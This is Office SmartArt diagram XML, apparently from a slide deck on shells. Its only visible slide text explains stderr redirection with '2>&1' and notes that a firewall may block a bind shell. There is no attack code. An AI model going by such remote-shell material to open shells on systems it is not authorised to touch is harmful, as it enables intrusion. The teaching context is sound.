    </dgm:pt>
    <dgm:pt modelId="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Using 2&gt;&amp;1 will redirect stderr to whatever value is set to stdout (and 1&gt;&amp;2 will do the opposite).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AA46F0-5791-497C-A9F8-558480C963F7}" type="parTrans" cxnId="{3D8B28DF-E221-486D-BB80-044001F9DFF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46B42D97-441D-4391-9E56-86AD960A6F4F}" type="sibTrans" cxnId="{3D8B28DF-E221-486D-BB80-044001F9DFF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" type="pres">
      <dgm:prSet presAssocID="{602D1FCA-0D40-4885-9502-EE3710779E2F}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3CF88368-8276-471A-A40A-8843C73DF173}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91F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0BE3BAF-DF7D-4B4D-8AB3-23B84697FB92}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74A0EA44-A96C-4C24-8580-64AB96E73839}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C30B7AD-A876-48D2-BF36-EA0FB7C0DA08}" type="pres">
      <dgm:prSet presAssocID="{ED1B876D-F2E4-494B-97FC-B057850BCD24}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E163AF8E-1215-4D26-8A36-97DCBF7D7F1B}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E33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15FFEF98-6DBF-4210-AC35-58A91629BAB4}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2801E6B8-4A73-4C3F-9111-284A9C8AF57F}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{934D7419-5234-4397-821F-92E1A963EF63}" type="pres">
      <dgm:prSet presAssocID="{CB7E91A0-188C-49F0-8836-E62F023A973E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EEE94CC-2C28-4F97-8528-9C5C648E47F3}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753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EDB1C461-2BCC-4734-AEB8-2FCA10D27217}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70320A24-EF85-4312-A899-99BBE36CD8BA}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6B14AED-6A11-424F-AA7C-28F220A80EC1}" type="pres">
      <dgm:prSet presAssocID="{06217971-3666-4A37-97D9-3D65509A4B0B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D16BF0E6-479D-4924-B7F5-F82D72AF8F8F}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75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F1C44124-5AFC-4DAA-8709-AFDF556A08A3}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99576F12-437F-411F-BD19-C98DF4696C5A}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1373A811-39C8-4044-9874-96D3C91786FE}" type="pres">
      <dgm:prSet presAssocID="{2E22FAB0-F2E6-4D54-9CA0-E8BA83CE3B60}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A920D47-CC62-4189-A54B-CD80B5B91CF5}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B550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mages"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{84BB6800-7BAD-4422-8D6D-C7F700C7F977}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FBFD4AB-9F9B-4113-8DB1-4AC637568A32}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" presName="textRect" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2E73925-7B2F-4204-938C-E9139DFC79F4}" type="pres">
      <dgm:prSet presAssocID="{26F172A4-F503-4DE0-9102-4FA52164763F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C439E1C6-CCCF-42DB-BAAB-1A534A55E923}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768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nected"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{0F8E9A6D-C32F-47A1-9524-5DD8F836DFFF}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0B2FD82-F60E-46C0-8C17-15A7F5741DED}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" presName="textRect" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{4FB60D15-3B8C-4F73-9F06-D50CD56047BE}" type="presOf" srcId="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" destId="{C0B2FD82-F60E-46C0-8C17-15A7F5741DED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{C8216E25-D689-4717-A67D-1C19CD3D8C4E}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" srcOrd="1" destOrd="0" parTransId="{E8F092DD-049F-4206-A292-9164F1D6833E}" sibTransId="{CB7E91A0-188C-49F0-8836-E62F023A973E}"/>
    <dgm:cxn modelId="{F5E78335-74D4-4FA1-A76A-7E7B43E3326E}" type="presOf" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1AFD7B3D-68FD-4693-93CF-E56ED4AE1DFC}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" srcOrd="0" destOrd="0" parTransId="{97E8125D-D4FF-4570-8E54-688A28EBE19C}" sibTransId="{ED1B876D-F2E4-494B-97FC-B057850BCD24}"/>
    <dgm:cxn modelId="{F1B4AD5C-A8A7-4BBF-81D9-C8E051252BF1}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" srcOrd="4" destOrd="0" parTransId="{06E96879-A389-4633-AC1A-E9D67AFD0AB7}" sibTransId="{26F172A4-F503-4DE0-9102-4FA52164763F}"/>
    <dgm:cxn modelId="{674AB07C-04E4-46E4-A3FE-9DBC98A34239}" type="presOf" srcId="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" destId="{2801E6B8-4A73-4C3F-9111-284A9C8AF57F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2014B37C-0848-4E12-9BD7-629528AE55EB}" type="presOf" srcId="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" destId="{74A0EA44-A96C-4C24-8580-64AB96E73839}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D3EAF79B-C5F0-448F-BFB4-483A386DD16F}" type="presOf" srcId="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" destId="{99576F12-437F-411F-BD19-C98DF4696C5A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{23BCC2A0-B3A4-416E-B08F-30CF66EA2292}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" srcOrd="3" destOrd="0" parTransId="{E319DC0D-8CB0-4532-8E06-456ED71C3F19}" sibTransId="{2E22FAB0-F2E6-4D54-9CA0-E8BA83CE3B60}"/>
    <dgm:cxn modelId="{593F49A9-BD1B-48C1-AA90-6DBE9D98FED9}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" srcOrd="2" destOrd="0" parTransId="{5A06259A-6181-4517-A6D2-216494B6B41F}" sibTransId="{06217971-3666-4A37-97D9-3D65509A4B0B}"/>
    <dgm:cxn modelId="{D7BA95C6-D3EF-4375-BD35-85DC11E56DE6}" type="presOf" srcId="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" destId="{3FBFD4AB-9F9B-4113-8DB1-4AC637568A32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3D8B28DF-E221-486D-BB80-044001F9DFF2}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" srcOrd="5" destOrd="0" parTransId="{A9AA46F0-5791-497C-A9F8-558480C963F7}" sibTransId="{46B42D97-441D-4391-9E56-86AD960A6F4F}"/>
    <dgm:cxn modelId="{9C3DCBF8-487F-4F2B-B2F8-B6490D2383D8}" type="presOf" srcId="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" destId="{70320A24-EF85-4312-A899-99BBE36CD8BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{66890A5C-4188-4463-91BF-5E8D4DB3C5C0}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E8BD736F-810A-4F67-9C44-BB8CDC4DDE05}" type="presParOf" srcId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" destId="{3CF88368-8276-471A-A40A-8843C73DF173}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{18CA8D09-4C6A-4006-B5E9-65C62647817F}" type="presParOf" srcId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" destId="{20BE3BAF-DF7D-4B4D-8AB3-23B84697FB92}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2E956AC4-D429-4895-A0BA-315B199253E6}" type="presParOf" srcId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" destId="{74A0EA44-A96C-4C24-8580-64AB96E73839}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{07A0F5C0-62A7-40E2-91DA-42BA8349EC61}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{7C30B7AD-A876-48D2-BF36-EA0FB7C0DA08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3535327A-7817-41AA-A83E-BE05A70F6BE5}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2BCE54F9-62EA-4441-9531-AC5F4A227919}" type="presParOf" srcId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" destId="{E163AF8E-1215-4D26-8A36-97DCBF7D7F1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{77612C80-D8A4-4CB3-977D-6130A921440D}" type="presParOf" srcId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" destId="{15FFEF98-6DBF-4210-AC35-58A91629BAB4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{0AA1AC43-503B-4025-AA52-CEB318F82BEA}" type="presParOf" srcId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" destId="{2801E6B8-4A73-4C3F-9111-284A9C8AF57F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1481AC49-C925-492C-91A8-B3FBD36905CC}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{934D7419-5234-4397-821F-92E1A963EF63}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{97071213-3E9B-4D95-99BC-D9AEFFB1365E}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{DC75C3F4-0B12-4767-8EBA-679DC6DE83D2}" type="presParOf" srcId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" destId="{1EEE94CC-2C28-4F97-8528-9C5C648E47F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{93728488-C0A3-4E5D-ACD3-B7FD48ED0F6D}" type="presParOf" srcId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" destId="{EDB1C461-2BCC-4734-AEB8-2FCA10D27217}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E5D10D36-5B2E-40A4-BBBC-FADA662A80B3}" type="presParOf" srcId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" destId="{70320A24-EF85-4312-A899-99BBE36CD8BA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{65494E25-6EEB-4A53-86E6-0D81E473F8FD}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{B6B14AED-6A11-424F-AA7C-28F220A80EC1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{DBE01884-1282-4659-B21D-5B9957316B18}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9A8C3496-81E2-476F-B679-58222C84F191}" type="presParOf" srcId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" destId="{D16BF0E6-479D-4924-B7F5-F82D72AF8F8F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2E69B0A9-ED98-406D-BA4E-7DF9952225D6}" type="presParOf" srcId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" destId="{F1C44124-5AFC-4DAA-8709-AFDF556A08A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B219474A-C29E-4362-B729-522BAEA8A0A7}" type="presParOf" srcId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" destId="{99576F12-437F-411F-BD19-C98DF4696C5A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1755F735-B81B-43A2-AB15-B9D20D063ED9}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{1373A811-39C8-4044-9874-96D3C91786FE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{13DE3043-59CF-4EC6-85A8-5BC8F6E8F06F}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{80577F85-983B-498B-85AE-F170D8E1FB20}" type="presParOf" srcId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" destId="{2A920D47-CC62-4189-A54B-CD80B5B91CF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{09C01B93-93EE-4651-A84D-48FB59B8E4F1}" type="presParOf" srcId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" destId="{84BB6800-7BAD-4422-8D6D-C7F700C7F977}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{AF51C695-5C1D-4130-938C-054790955977}" type="presParOf" srcId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" destId="{3FBFD4AB-9F9B-4113-8DB1-4AC637568A32}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{79E93D35-953F-400A-B2D2-E8377FE85D83}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{B2E73925-7B2F-4204-938C-E9139DFC79F4}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{6B15AB75-BC05-4217-B63D-3673FA475BA8}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{AF1CD1CF-B881-44DF-AFA9-28FD33838527}" type="presParOf" srcId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" destId="{C439E1C6-CCCF-42DB-BAAB-1A534A55E923}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{12A079BA-26D3-4DB8-B22D-71F2A787E521}" type="presParOf" srcId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" destId="{0F8E9A6D-C32F-47A1-9524-5DD8F836DFFF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{58074B25-91A4-4C8B-BC50-E159069F5640}" type="presParOf" srcId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" destId="{C0B2FD82-F60E-46C0-8C17-15A7F5741D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73800C-0F25-4317-AB8F-D63A811B0889}"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7F576481-BEB9-480F-8326-83EEE58C2D9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D8438CC-7B53-4A90-B635-D396E7FA84E1}" type="parTrans" cxnId="{BBAA1694-1BB5-44C5-ABF5-203682607534}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04CBB1E8-D136-4D62-A577-640CF97D21DA}" type="sibTrans" cxnId="{BBAA1694-1BB5-44C5-ABF5-203682607534}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0278A277-47DC-47BE-A3A2-047C7EF31F78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>firewall etc. may block the bind shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0AFC0C-AAEB-47F4-8967-4468F892E11A}" type="parTrans" cxnId="{A31D3D49-6157-4E9C-BA48-C87C0983D824}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A6B113A-F92E-4BEE-A1E3-B2CA8CC511D2}" type="sibTrans" cxnId="{A31D3D49-6157-4E9C-BA48-C87C0983D824}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" type="pres">
      <dgm:prSet presAssocID="{5E73800C-0F25-4317-AB8F-D63A811B0889}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DCC997E6-26A0-4011-85BE-4027DA7B17DF}" type="pres">
      <dgm:prSet presAssocID="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FAAD9AAB-FAE9-4CDA-97C8-043A29EBE4A2}" type="pres">
      <dgm:prSet presAssocID="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" presName="parentTextBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4CF35A89-D597-4CE4-9A78-4737C1073586}" type="pres">
      <dgm:prSet presAssocID="{04CBB1E8-D136-4D62-A577-640CF97D21DA}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4CD31109-9E3D-456C-93DF-A51208351A50}" type="pres">
      <dgm:prSet presAssocID="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8AD}" type="pres">
      <dgm:prSet presAssocID="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A31D3D49-6157-4E9C-BA48-C87C0983D824}" srcId="{5E73800C-0F25-4317-AB8F-D63A811B0889}" destId="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" srcOrd="1" destOrd="0" parTransId="{4A0AFC0C-AAEB-47F4-8967-4468F892E11A}" sibTransId="{0A6B113A-F92E-4BEE-A1E3-B2CA8CC511D2}"/>
    <dgm:cxn modelId="{9F45C56B-47C8-4738-B372-E44D6BEAF1B8}" type="presOf" srcId="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" destId="{FAAD9AAB-FAE9-4CDA-97C8-043A29EBE4A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{D5393456-C749-4523-A963-51C92F1607E2}" type="presOf" srcId="{5E73800C-0F25-4317-AB8F-D63A811B0889}" destId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
